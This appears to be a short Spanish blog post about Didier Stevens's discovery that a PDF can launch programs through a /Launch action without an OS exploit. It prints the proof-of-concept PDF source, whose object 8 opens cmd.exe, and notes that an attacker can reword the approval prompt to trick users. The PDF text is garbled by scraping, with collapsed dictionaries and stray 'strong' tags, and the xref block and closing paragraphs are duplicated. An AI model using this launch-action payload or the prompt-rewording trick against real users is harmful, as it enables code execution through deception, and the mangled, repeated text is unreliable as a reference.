Esto es lo ultimo en seguridad y para estar preocupados, un hacker, un tal Didier Stevens ha descubierto una forma de ejecutar código en un pdf sin explotar ninguna vulneridad del sistema operativo.
xref
0 9
0000000000 65535 f
0000000012 00000 n
0000000109 00000 n
0000000165 00000 n
0000000234 00000 n
0000000401 00000 n
0000000505 00000 n
0000000662 00000 n
trailer
>
startxref
751
%%EOF
El usuario debe aprobar la ejecución (excepto en FoxitReader) pero el atacante puede personalizar el mensaje que se muestra al usuario.
No se especifica pero entiendo que incluso podría cambiar el sentido de la advertencia. Pasar de "Quiere permitir la ejecución ?" a "Quiere bloquear la ejecución ?".
Comentarios
El pdf que ejecuta la consola de comandos por dentro:
%PDF-1.1
1 0 obj
>
endobj
2 0 obj
>
endobj
3 0 obj
>
endobj
4 0 obj
>
>>
endobj
5 0 obj
>
stream
BT
/F1 24 Tf
100 700 Td
(Hello World)Tj
ET
endstream
endobj
6 0 obj
[/PDF /Text]
endobj
7 0 obj
>
endobj
8 0 obj
strong/Type /Action/strong
strong/S /Launch/strong
strong/Win/strong
strong/strong
strong/F (cmd.exe)/strong
strong/strong
strong>
endobj
xref
0 9
0000000000 65535 f
0000000012 00000 n
0000000109 00000 n
0000000165 00000 n
0000000234 00000 n
0000000401 00000 n
0000000505 00000 n
0000000662 00000 n
trailer
>
startxref
751
%%EOF
El usuario debe aprobar la ejecución (excepto en FoxitReader) pero el atacante puede personalizar el mensaje que se muestra al usuario.
No se especifica pero entiendo que incluso podría cambiar el sentido de la advertencia. Pasar de "Quiere permitir la ejecución ?" a "Quiere bloquear la ejecución ?".